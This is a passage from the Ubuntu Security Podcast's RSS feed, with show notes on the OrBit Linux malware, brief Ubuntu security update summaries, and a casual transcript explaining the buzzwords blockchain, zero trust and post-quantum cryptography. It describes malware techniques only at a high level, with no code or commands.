<li><a href="https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/">https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/</a></li>
<li>Similar to Symbiote which we covered in <a href="https://ubuntusecuritypodcast.org/episode-163/">Episode 163</a> - Intezer has
detailed another Linux malware sample</li>
<li>Like Symbiote, the dropper component for OrBit targets arbitrary binaries
via the linker - however, unlike Symbiote, doesn&rsquo;t use <code>LD_PRELOAD</code>
environment variable but instead instructs the dynamic linker via
<code>/etc/ld.so.preload</code> - this has benefits for the malware since the use of
the <code>LD_PRELOAD</code> env var has various restrictions around setuid binaries
etc - but this is not the case of <code>/etc/ld.so.preload</code> meaning all binaries
<strong>including</strong> setuid root ones are also &ldquo;infected&rdquo; via this technique and the
malware payload gets loaded for all</li>
<li>Then payload then hooks functions from libc, libpcap and libpam so that
all other binaries on the system which use these libraries then use the
payloads malicious variants of these functions</li>
<li>Allows it to then harvest credentials (via pam), evade detection (via
libpcap) and gain persistence and remote access</li>
<li>By hooking libc it can then also hide in plain sight by making sure when
other binaries call functions like <code>readdir()</code> the presence of the malware
itself is omitted - same for even <code>execve()</code> so that if say a binary like
<code>ip</code>, <code>iptables</code> or even <code>strace</code> is then executed, it can modify the output
which is returned to omit its own details</li>
<li>As we discussed with Symbiote, even though it goes to great lengths to
hide in plain sight, could still be detected via offline forensic
analysis etc</li>
<li>Interesting to see similar techniques used across the various malware
samples</li>
<li>No info on how initial compromise / privesc is achieved since this is
required to allow the malware to use <code>/etc/ld.so.preload</code> - but likely is
via vulnerabilities in privileged internet facing applications - as such,
MAC systems like AppArmor then become very useful for confining these
services so they cannot arbitrarily write to these quite privileged files
etc</li>
<li>POLA is one of the basic tenets of good security</li>
</ul>
<h3 id="ubuntu-21-dot-10--impish-indri--eol-12-40">Ubuntu 21.10 (Impish Indri) EOL [12:40]</h3>
<ul>
<li>Officially EOL yesterday (14th July 2022)</li>
<li>Will no longer receive security or bug fix updates etc</li>
<li>Upgrade to Ubuntu 22.04 LTS - 5 years of standard support plus 5 years of
ESM (free for personal use on up to 3 machines) - 10 years total of
support</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E168.mp3" length="10879437" type="audio/mpeg" /><itunes:duration>840</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 167
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-167/</link>
          <pubDate>Mon, 11 Jul 2022 16:42:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>d951151f5e854829dda7bf83527a57073eaf568493c13c48f3f942c63cbb1b57ca6322347e45784a8e52a953100af4864379a8f88243dd8ddbffbfecb6307eb5</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 167</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we bring you part 3 of Camila's cybersecurity buzzwords series -
  looking at blockchain, zero trust and quantum / post-quantum security.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we bring you part 3 of Camila's cybersecurity buzzwords series -
  looking at blockchain, zero trust and quantum / post-quantum security.
  </itunes:summary>
        <description>  This week we bring you part 3 of Camila's cybersecurity buzzwords series -
  looking at blockchain, zero trust and quantum / post-quantum security.
  </description>
        <googleplay:description>  This week we bring you part 3 of Camila's cybersecurity buzzwords series -
  looking at blockchain, zero trust and quantum / post-quantum security.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we bring you part 3 of Camila&rsquo;s cybersecurity buzzwords series -
looking at blockchain, zero trust and quantum / post-quantum security.</p>
<h2 id="decoding-cybersecurity-buzzwords--part-3--00-10">Decoding cybersecurity buzzwords (part 3) [00:10]</h2>
<p>Hello listener! Hopefully I set the stage well enough last time that you
are back here today for more after getting excited about ending our cyber
security buzzword journey with a bang! A journey where we try to understand
the meaning of the word behind the buzz in order to better navigate this
crazy world of ours! A little bit of an exaggerated description, some might
say, but definitely not lacking in inspiration! If you haven&rsquo;t listened to
our previous episodes I highly recommend you do so before proceeding with
this one, as preparation will be key to digest what is to come. Oh yes,
today is going to be a good one. So let&rsquo;s get buzzing and let&rsquo;s get into
it, shall we?</p>
<p>Buzzword #7 - which is the first buzzword of today: blockchain. Ah&hellip;this
one I had to do some serious research on, because even though I hear about
it all the time, as you probably do to, I didn&rsquo;t really know the specifics
of how it worked. Anyway, one thing I did know is that this is DEFINITELY a
buzzword, one that started trending and gaining traction together with all
of the crypto currencies that started showing up out there. And now, I
can&rsquo;t even see a job listing without the good old Blockchain developer
position included within the various openings. So, what is the notorious
blockchain afterall? Even after researching about this and learning more,
it is still a very complicated thing to explain, so please be patient with
me if I don&rsquo;t get all the details right, although I will attempt to be as
accurate as possible. Well, let&rsquo;s board this train and use crypto
currencies to explain how blockchains work from a HIGH LEVEL point of view,
shall we? Please do note, however, that I did say HIGH LEVEL! I am by no
means a block chain/crypto currency expert, as I previously mentioned, and
I will only share with you the basics of how this thing works, so that we
can really get past the buzzword point of the word, even though we might
not reach the true connoseuir point of it. Anyway! Let&rsquo;s get to it!</p>
<p>Think about a blockchain as being a distributed ledger, which as per
dictionary definition is a &ldquo;a book or other collection of financial
accounts of a particular type&rdquo;. So, this applies to our cryptocurrency
example here, and to blockchains being applied to crypto currencies. Just
to make that very clear. Each block in the blockchain is like a page of
this ledger. What about the chain? We will get to that part soon
enough. For our cryptocurrency situation here, let&rsquo;s consider that each
block in our blockchain will contain three important groups of information:
data regarding transactions that have been happening for a specific
cryptocurrency, a hash for this data and the hash of the block that was
generated before it, or, if you&rsquo;d rather think of it in analogy terms, the
hash of the &ldquo;page&rdquo; that comes before it. What is a hash, you might ask? To
keep it simple, since our topic for today is not hashing, a hash is a fixed
size data output that is generated after the processing of some kind of
input of variable length. So, for example, a number generated as output for
the input data that is a word, which can have from 1 to&hellip;a lot of
letters. The word is processed such that the position of each letter in the
alphabet is used in a sum that starts with value 0. Word &lsquo;blockchain&rsquo;, in
this case, would have a hash of&hellip;uh, I don&rsquo;t want to calculate that, so
let&rsquo;s choose a simpler example. Word &lsquo;aaa&rsquo; would have a hash of 3. There,
nice and easy&hellip;and lazy. Anyway, with a good hash function - a
cryptographic hash function - different input data, after processed by a
specific hash algorithm, will 99% of the time generate different outputs
(which is not the case for our earlier example. You can try to figure out
different words that would have the same hash. I&rsquo;ll leave that as an
exercise for you). All of the outputs will possess the same format, which
is usually a fixed size sequence of alphanumeric characters, but, more than
that, for our case, predicting changes in the hash by analyzing changes in
the data is not something easy to do, that is how powerful out
cryptographic hash algorithm is. Therefore, we can look at our hashes as if
it were the fingerprint of the data it is connected to, if said data were a
person able to have fingerprints. Different data equals different
fingerprints, and forging a fingerprint, or, in other words, changing your
own, is not something you can easily or seamlessly do. Ok&hellip;that being
said, can you start seeing how our blocks actually constitute a chain? We
have various sets of data containing information about financial
transactions that are happening. Connected to each set is the hash for that
specific set, as is the hash of the set that came before it! So block n
will always know who n-1 is, n-1 will know who n-2 is, and so on and so
forth. Therefore, if I am an attacker and I want to tamper with the data in
the blockchain and say&hellip;add a transaction in which I make my worst enemy
transfer all of their funds to my account, I can&rsquo;t just change the data of
a block in the middle of the chain without causing havoc for all of the
blocks that follow it. To be able to sneakily add my fake transaction into
the blockchain, not only would I need to change the data segment of the
block which will contain the transaction, I will also need to change the
“hash of the previous block” segment for all blocks that come after this
block. If I am able to do this instantaneously, say&hellip;using a computer,
then the problem is solved. But of course it wouldn&rsquo;t be that easy, or else
I don&rsquo;t think everyone and their mother would be freaking out about how
awesome or how safe blockchain is. What is the catch then? The blockchain
protocol forces you to provide a proof-of-work every time you wish to add a
block to the chain. What exactly does this mean? The blockchain challenges
you. It tells you: you cannot add a page to the ledger that is myself
unless you solve this very hard puzzle that even a computer will take a
humanly noticeable time to solve. This puzzle could be, for example,
discovering which set of 100 characters you need to add at the end of the
data set to force the block&rsquo;s hash to start with 10 consecutive zeros. As I
previously said, it is not easy to predict what is the output of a hash
function given an input when you have a good hash function, so the easiest
way to achieve this is by brute forcing it: testing all possibilities until
you find something that matches that which you are looking for. Therefore,
to add a block to the chain, you must waste some time solving the puzzle,
which in turn means that changes made to the middle of the chain cannot
propagate instantaneously throughout the tail of the chain. You change a
block and you need to change all that follow, but for each block you will
take some time solving the puzzle before adding it to the chain. If I were
the one listening to this podcast and not the one doing the explaining, at
this point I would have two questions: (1) why does this matter if I have
full control of the blockchain? (2) Why not add your malicious transaction
to the last block instead of adding it to a block in the middle and solve
this whole &lsquo;having to update subsequent blocks&rsquo; in order to achieve lots of
money in your bank account? I don&rsquo;t know if you have these questions as
well, or started asking them after I mentioned it, but what I do know and
what I can tell you is that the same answer applies to both of these:
blockchain does not rely on a centralized entity to manage it, it is
instead distributed. Why should we care? Because then there is never only
one person that is in full control of the blockchain (the ledger). Everyone
is able to grab a copy of this blockchain, follow which transactions are
happening, and include them into a new block. If more than 50% of the peers
which participate in building the ledger agree on the new block to be
added, meaning, if more than 50% has the same resulting block after
including transactions broadcasted and gathered, then this block is
officially added to the chain and considered the last block of said
chain. Therefore, if I plan to include a fake transaction to the new block
that will be added to the chain, I need 50% of the peers that are also
listening to transactions and building this new block to agree to include
my fake transaction, which might seem simple if you have a lot of friends,
but the beauty in having a non-centralized server lies in diversity and on
the fact that most people will probably not want to partake in you shady
activities of tampering with the blockchain. And even if it is technically
possible to do this Mr.Smarty Pants - I see you there in the corner - that
will try to bring the argument down by saying “but what if I am super
powerful and I CAN convince everyone to do it”, see it as one more thing a
potential attacker needs to do, another burdensome task to perform in order
to achieve the desired result: change the block AND convince more than 50%
of the people in the peer network to go along with it. Have you ever been
in any comment section on the Internet? If you have, you know that
&lsquo;agreeing on things&rsquo; is not something the Internet community does very
well. Anyway&hellip;more than preventing you from changing the last block, the
distributed peer network will also enforce the utility of things such as
the proof-of-work. If the blockchain were to be controlled by one single
entity, then it matters less if it takes one nanosecond to perform the
proof-of-work or if it takes a few minutes. You are a single entity in
control of the data, you can eventually catch up with the new blocks that
will be added to the chain. Maybe you have 1000 super computers on the side
to calculate the blocks that will follow your tampered one, and then the
proof-of-work is rendered kind of useless. However, with a distributed
network, each peer is trying to solve the puzzle to add the next block to
the chain, and once again, you can create however many blocks with fake
data you want, if the entire peer-to-peer network disagrees with you on
what that block should be, it won&rsquo;t be added to the chain&hellip;and you will
need to ask that for each new block you want to add. Other people, some of
which might not have been bribed by Mr. Smarty Pants, may end up obtaining
the next block in the chain first, and then all of your super computers
will have worked for naught, and you would need to start all over
again. It&rsquo;s like participating in an auction&hellip;you can make a very high
bid&hellip;but other people can also do the same. Plus, it&rsquo;s even worse because
everyone participating in the auction is actually checking your bank
account to see if you really have the money you claim to have, and if you
make a false bid&hellip;they can call you out on your lies if they wish to do
so. The last question I think remains is: what would make people want to
participate in the creation of a blockchain? Seems like too much work and
no fun, and choosing people for the job defeats the purpose of not having a
centralized entity to manage the ledger, because then, as the verb implies,
you get to CHOOSE who will participate, and you can choose whoever you
want, and maybe these will be people that will side with you. Well, for
crypto currencies I can tell you that the bang is in the buck. The person
that is the first to solve the puzzle which allows for inclusion of a new
block in the chain is rewarded with a certain amount of crypto
currency. Therefore, people want to participate in the blockchain creation
and make sure to check that all is well because they will gain something
from it. This is what we know as crypto mining. Someone who is crypto
mining is trying to earn some digital cash by adding a new block to the
crypto currency ledger before other people, and that is how the problem is
solved. Give the people something that they want and they shall follow!
Well&hellip;I think that is enough talk about blockchain, am I right? This is so
long that it has almost become a mini-episode inside of a bigger one! So
let&rsquo;s move on and actually go to our next and almost last buzzword of this
series of episodes!</p>
<p>Next buzzword, suggested by our one and only Alex Murray, buzzword #8, is
zero trust. This one is a hard one for me to explain and I will tell you
why: I already have kinf of a zero trust mentality, or at least I have only
heard of the &ldquo;zero trust way&rdquo; ever since I started studying cyber
security. Or maybe it is because the term zero trust was coined very close
to the time I was born. Baby me didn&rsquo;t even have to know the non-zero trust
model, because at that time the &ldquo;never trust, always verify&rdquo; slogan for
this model was already something people were considering. So what is zero
trust after all? I think I will begin defining it by saying it is a
model. A set of rules, frameworks and principles to take into consideration
when setting up your IT infrastructure, one that, as the slogan itself
says, trusts no one. Trusts zero persons&hellip;zero trust. Get the origin of
the name now? As a second way to define it, or as a way to compliment the
definition, let us go back and understand what is a non-zero trust model
and why the zero trust model was created. A time where the Internet was
simpler, and networks were a lot more self contained than they are
today. The clouds were only the ones you could see flying around in the sky
and WiFi was probably just a weird name someone would give to their
pet. When your entire infrastructure is restricted to one single area and
your network can only be accessed by those physically present where devices
of that network are also physically present at, it is easy to define your
headquarters and whoever is in it as being a safe space, with safe
people. You only let in people who are allowed to be in there, and people
who are allowed to be in there won&rsquo;t cause any harm to the infrastructure
because they are friends, and not foes. Right? In comes the insider threat,
that disgruntled employee that decides to do malicious things to the
company&rsquo;s resources and has the means to do so exactly because they are
trusted. In comes more technology that allows your infrastructure to exist
in more than one physical location, and that allows people to access
company resources from areas outside the supposed trusted security
perimeter. In come new business models for software products where third
party companies are responsible for managing resource from your own company
as part of a service provided by them together with their own software. And
then the castle walls are no longer enough to protect the kingdom, because
the kingdom is no longer just within the castle walls. Zero trust is the
model that starts to consider security when the castle walls are no longer
enough to prevent the occurrence of cyber attacks, exactly because we can
have foes which are inside our own network and because we are expanding our
own network and letting it exist beyond what would be a trusted physical
location. To mention a few exampĺes&hellip;remember our previous buzzword
&lsquo;phishing&rsquo; from a few episodes back? Well imagine that you have an attacker
which is able to successfully trick one of your employees in a phishing
campaign they are running. This employee clicks a malicious link and gives
this attacker access to the target company&rsquo;s internal network with their
own set of credentials. In a model that is not zero trust, this employee’s
user might have a lot of privileges inside the network. Why not let them
access the database containing sensitive data? They work for the company,
they must be trustworthy! &hellip;and yet&hellip;now our attacker has access to that
same database because they were able to trick someone we trust into giving
them privileged information. Notice how we don&rsquo;t even need to have a
disgruntled employee to have an insider threat. It can be the happiest
company in the world! All people who work for this company love it and
would never harm it&hellip;but one of its employees just became an unknowing
insider threat because they fell for the tricks of an attacker well trained
in the arts of social engineering. Attacks have evolved, so the security
model needs to evolve with it, and that is one of the advantages of
considering the zero trust model. Another example of a situation where you
might need to consider this model: nowadays we can access our work
environments from anywhere, so long as anywhere has an available WiFi
password for you to use. Maybe you work from home but you are tired of
looking at the same boring old view from outside your window. You decide to
go work at a local sweets shop for a change of scenery and a change in your
lunch menu for that day. The shop has a delightful atmosphere and also has
free WiFi. You connect to their network and start working, filled with new
energy and joy while you drink a cup of coffee and eat some delicious
&lsquo;insert any type of food that you love here&rsquo;. And yet&hellip;ah, once again I
say &lsquo;and yet&rsquo;, and by now you must know some bad news is coming: and yet,
this is a free network, meaning that anyone, including attackers can
connect to it. You might use a VPN to access your company’s internal
network, which encrypts data you are sending through the public network to
it, however, you also end up using some applications without connecting to
a VPN and sometimes without even having to use encryption. An attacker is
sniffing for data, searching for gold, in this sweets shop’s local network,
and ends up running across your network traffic and is able to extract some
juicy information from it. And once again assets and resources are not kept
safe because not enough is being considered when establishing processes and
permissions for a company&rsquo;s network. Yes, you are a trusted user and your
device SHOULD be trustworthy, but as many times we have seen, it is not
always that theory and practice shake hands and call it a day. IT
infrastructures have evolved, so the security model needs to evolve with
it, and that is one of the advantages of considering the zero trust
model. Oh&hellip;wait? Am I repeating myself? Then it must mean I really want
you to remember that, don&rsquo;t you think? Anyway, to close this topic off, I
will say that one of the most important principles in the zero trust model
is the principle of least privilege, which is a good place to start from if
you intend to implement this model in your own environment. The principle
of least privilege states that you should only allow a user to have access
to resources that they will actually need&hellip;no less and no more. No less
because otherwise they won&rsquo;t be able to do their jobs. No more because if
you give them more, you are UNNECESSARILY increasing the attack surface for
your network. If something does not exist, it cannot be taken advantage
of. And that is where I&rsquo;ll leave it&hellip;so you can think about this a little
more while drinking your coffee and connecting to that free WiFi network in
a sweets shop. Careful!</p>
<p>Give it up to buzzword #9, our last buzzword in the list! Quantum and post
quantum security! Let&rsquo;s finish this off with a big bang, pun intended for
the physics lovers out there, and talk about the eerie and wacky thing that
is quantum computing. Not really though, because I can definitely assure
you that physics is not my jam, and as the name suggests, quantum computing
is related to physics and, surprise, surprise, the quantum theory! So&hellip;I
could say that the next generation of computers will arise in quantum
computers, however, it is a little bit more complicated than that, as the
quantum computer will be useful to solve a specific set of problems, mainly
the ones it was conceptualized to solve. As a bonus, some problems it will
be able to solve include a few well known ones which we still can&rsquo;t
efficiently solve with our old regular computers today. However, at the
same time problems solved by quantum computers also do not include some of
the problems which we already can solve with our old regular computers
today. Quantum computers, for example, are not too big on big data, and are
limited in their I/O capabilities&hellip;so we can keep using regular computers
for that. It also wouldn&rsquo;t be very interesting to use a quantum computer to
write blog posts, or create internet memes or even use an app to listen to
this awesome podcast: shameless plug. The point is, the quantum computer
will not substitute our well known 0s and 1s calculator, it will instead be
useful, to solve a few sets of complex problems which require small data
sets as input and to model quantum systems…hence the name quantum
computers. All of that being said, instead of a son of what we know as the
current computer, we could see the quantum computer as a young cousin of
our well known 64bit friend. Quantum computing, to perform calculations,
instead of simply using the regular transistors which represent a 0 or a 1
at a certain point in time, tries to consider the collective properties of
quantum states, such as superposition, interference, and entanglement, to
obtain results we wouldn&rsquo;t be able to with the technology we currently
have. Wow, so many complicated words in one sentence! I won&rsquo;t explain any
of those today though, sorry about that.  However, what I will explain is
that instead of bits, quantum computers use qubits. Qubits can have more
than just a 0 or 1 state at a given instant, and this state is actually
based on probabilities of results you might have for a certain task. When
solving a specific problem, a regular computer needs to test all
possibilities individually since bits can only have one state at a given
time, while a quantum computer, due to the nature of qubits, is able to go
down various paths at once since qubits are able to exist in more than one
state at a given time. Of course, to extract useful data from such a
different base unit, you need to create algorithms that will appropriately
use them and extract results from them, so quantum computer algorithms are
not the same as our regular and well known 0 and 1 logic gate
algorithms. Yes, I know&hellip;I explained a lot of stuff without actually
explaining it, and unfortunately&hellip;I can&rsquo;t offer you much more. Even
scientists say they don&rsquo;t fully understand quantum theory, so I can assure
that lil&rsquo; old me will not be the one to crack that code before
them. However, what I can offer you an explanation on why this has become a
CYBER SECURITY buzzword. Out of physics and back into cyber security! We
might not be using quantum computers to write blog posts about quantum
computing itself, however, we CAN use quantum computers to easily and
quickly solve problems which would kind of render our current cryptographic
algorithms useless! So, the current asymmetric cryptographic algorithms
that we use are based on mathematical premises which the quantum computer
aims to quickly ignore. One example of that is the ever difficult problem
of obtaining the prime factors for very large numbers. Being able to factor
a number and extract its prime factors might seem like something simple: 6
equals to 2 times 3. 51 equals 3 times 17, 100 equals 2 times 2 times 5
times 5&hellip;and so on. Start actually putting in some large numbers over
there and then ask yourself the same question: what are the prime factors
of 589.450.367.123.907? Now imagine that with a decimal number that has 617
digits. You might want to buy a lot of pens if you plan on doing that by
hand, because I can tell you not even your computer can do that in a viable
time frame. You will be living your billionth next life when the computer
beeps reminding you that one of your past incarnations wanted to crack that
key. The point here is, this is a difficult problem to solve and that is
why these algorithms are considered safe and are widely used in encryption
protocols for various software out there. In come quantum computers and
actually make this an easy and quick problem to solve. Yeah&hellip;I know what
you are thinking&hellip;now what? Now my friends, it is time to focus our
efforts on developing post-quantum cryptographic algorithms! And there it
is, our actual last buzzword! Have you ever heard the saying &ldquo;if it ain&rsquo;t
broke, don&rsquo;t fix it&rdquo;? Well, in this case, it will be broken, repeatedly, so
we do need to fix it! We need to find new ways to encrypt our data, and
evolve cryptographic algorithms in order to maintain confidentiality of
this data when faced with possible future quantum computer attacks. And
yes, I know that quantum computers will not be easily accessible to every
single person on the planet, at least in the beginning, as I also know that
quantum attacks won&rsquo;t be your everyday script-kiddie daily attack of
choice. That does not mean, however, that we shouldn&rsquo;t be preparing for a
reality we are certain will exist in the future. Better safe than
sorry. Better still encrypted than sorry!</p>
<p>Well friends, those are the buzzwords I have for you. I created this list
based on words I know and am quite tired of seeing everywhere, and also
based on suggestions given to me by the Ubuntu Security team! However, I do
know that these are not the only ones, and that these will definitely not
be the last words we extensively overhear regarding the cyber security
world. As we all know, technology is ever changing and ever evolving, and
in suit, the buzzwords shall follow. Maybe in a few years you can do a
check-in, go back to this episode and see what has changed and how you
might see some of these buzzwords in a different light once they have lost
their buzz and new queen bees have arrived to torment us in every cyber
security advertisement ever! Feel free to share your thoughts and share
words I might have missed that you think are cyber security buzzwords in
any of our social media channels! I hope you enjoyed this series, for now,
I bid you all farewell, and until next time! Bye!</p>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E167.mp3" length="19048865" type="audio/mpeg" /><itunes:duration>1946</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 166
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-166/</link>
          <pubDate>Sat, 02 Jul 2022 13:43:00 +1000 </pubDate>
          <dc:creator></dc:creator>
          <guid>7fc48246b9f49d2ef034ba9347a3956a125b773b9173f5766823bd1e3ec7b5ad88bbc35c050c294e5fd2140ca64a0425926a9b911da7a21cf4baf783f37f88e4</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 166</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          From the deep-web to encryption we decode more cybersecurity buzzwords,
  plus we cover security updates for Squid, Vim, the Linux kernel, curl and
  more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  From the deep-web to encryption we decode more cybersecurity buzzwords,
  plus we cover security updates for Squid, Vim, the Linux kernel, curl and
  more.
  </itunes:summary>
        <description>  From the deep-web to encryption we decode more cybersecurity buzzwords,
  plus we cover security updates for Squid, Vim, the Linux kernel, curl and
  more.
  </description>
        <googleplay:description>  From the deep-web to encryption we decode more cybersecurity buzzwords,
  plus we cover security updates for Squid, Vim, the Linux kernel, curl and
  more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>From the deep-web to encryption we decode more cybersecurity buzzwords,
plus we cover security updates for Squid, Vim, the Linux kernel, curl and
more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>16 unique CVEs addressed</p>
<h3 id="usn-5491-1-squid-vulnerability-00-29">[<a href="https://ubuntu.com/security/notices/USN-5491-1">USN-5491-1</a>] Squid vulnerability [00:29]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-46784">CVE-2021-46784</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible DoS when handling Gopher protocol (early alternative to HTTP)</li>
</ul>
<h3 id="usn-5487-2-usn-5487-3-apache-http-server-regression-01-09">[<a href="https://ubuntu.com/security/notices/USN-5487-2">USN-5487-2</a>, <a href="https://ubuntu.com/security/notices/USN-5487-3">USN-5487-3</a>] Apache HTTP Server regression [01:09]</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31813">CVE-2022-31813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30556">CVE-2022-30556</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-30522">CVE-2022-30522</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29404">CVE-2022-29404</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28615">CVE-2022-28615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28614">CVE-2022-28614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26377">CVE-2022-26377</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-165/">Episode 165</a></li>
</ul>
<h3 id="usn-5492-1-vim-vulnerability-01-25">[<a href="https://ubuntu.com/security/notices/USN-5492-1">USN-5492-1</a>] Vim vulnerability [01:25]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-2042">CVE-2022-2042</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF which could be triggered when opening and then searching through a
crafted file -&gt; crash -&gt; DoS / RCE</li>
</ul>
<h3 id="usn-5493-1-linux-kernel-vulnerability-01-54">[<a href="https://ubuntu.com/security/notices/USN-5493-1">USN-5493-1</a>] Linux kernel vulnerability [01:54]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28388">CVE-2022-28388</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>GA kernels (5.13 for 21.10, 5.4 for 20.04 LTS, 4.15 for 18.04 LTS and 4.15 HWE for 16.04 ESM)</li>
<li>8 Devices USB2CAN driver - double-free in error scenario - local attacker
could use a crafted device to trigger -&gt; DoS</li>
</ul>
<h3 id="usn-5494-1-spidermonkey-javascript-library-vulnerabilities-02-47">[<a href="https://ubuntu.com/security/notices/USN-5494-1">USN-5494-1</a>] SpiderMonkey JavaScript Library vulnerabilities [02:47]</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-31740">CVE-2022-31740</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28285">CVE-2022-28285</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>aka libmozjs-91 - 91.10</li>
<li>Jeremy Bicha from Ubuntu Desktop team</li>
<li>Not easy to identify security issues in mozjs - Jeremy had to search
through the list of commits in mozjs and search for bug numbers in
upsteam mozilla bug tracker which were then referenced by the various
Mozilla security advisories</li>
<li>also incidentally fixes a FTBFS with vendored ICU (test failure during
build)</li>
</ul>
<h3 id="usn-5495-1-curl-vulnerabilities-04-19">[<a href="https://ubuntu.com/security/notices/USN-5495-1">USN-5495-1</a>] curl vulnerabilities [04:19]</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-32208">CVE-2022-32208</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32207">CVE-2022-32207</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32206">CVE-2022-32206</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-32205">CVE-2022-32205</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>All 4 issues identified by Harry Sintonen
<ul>
<li>Mishandling of Set-Cookies header - crash -&gt; DoS</li>
<li>mishandling of chained HTTP compression algorithms - a server which
compressed a response with a huge number of repeated steps could result
in a malloc bomb during decompression -&gt; OOM -&gt; DoS</li>
<li>Failed to properly set permissions when downloading cookies or other
files so they could possibly by read by other users - can mitigate by
making sure you use a strict umask locally (but that can have other
unintended consequences for other applications)</li>
<li>FTP xfer secured by krb5 - fails to properly verify messages - could
then have a MiTM inject data etc</li>
</ul>
</li>
</ul>
<h2 id="decoding-cybersecurity-buzzwords--part-2--06-07">Decoding cybersecurity buzzwords (part 2) [06:07]</h2>
<ul>
<li>From encryption to the deep/dark web Camila continues the journey into
demystifying some more of the most popular buzzwords in cybersecurity</li>
</ul>
<h3 id="transcript">Transcript</h3>
<p>Hello listener! Welcome to part 2 of our cyber security buzzword series!
Last episode we talked about ransomwares, botnets and phishing attacks!
Let&rsquo;s keep the bees happy and continue on in this buzzing journey of better
understanding what is the meaning behind the word and turning the
&ldquo;bzzzzzzzzzz&rdquo; into an &ldquo;aaaaah, I see&rdquo; instead! 039 If you haven&rsquo;t listened
to the last episode I highly recommend you do it before you proceed with
this one, but hey, that is your choice. I don&rsquo;t want to take too long with
this introduction, so, for those who are already in for this ride, without
further ado, let&rsquo;s jump in! Our first word of today and the fourth
overall&hellip;we&rsquo;ve talked about it before, and we are talking about it now
once again… buzzword #4 is the one and only firewall! If you listened to
the episodes involving the Ubuntu hardening topic, you already know that
our dearest friend firewall is one way to keep your network safe because it
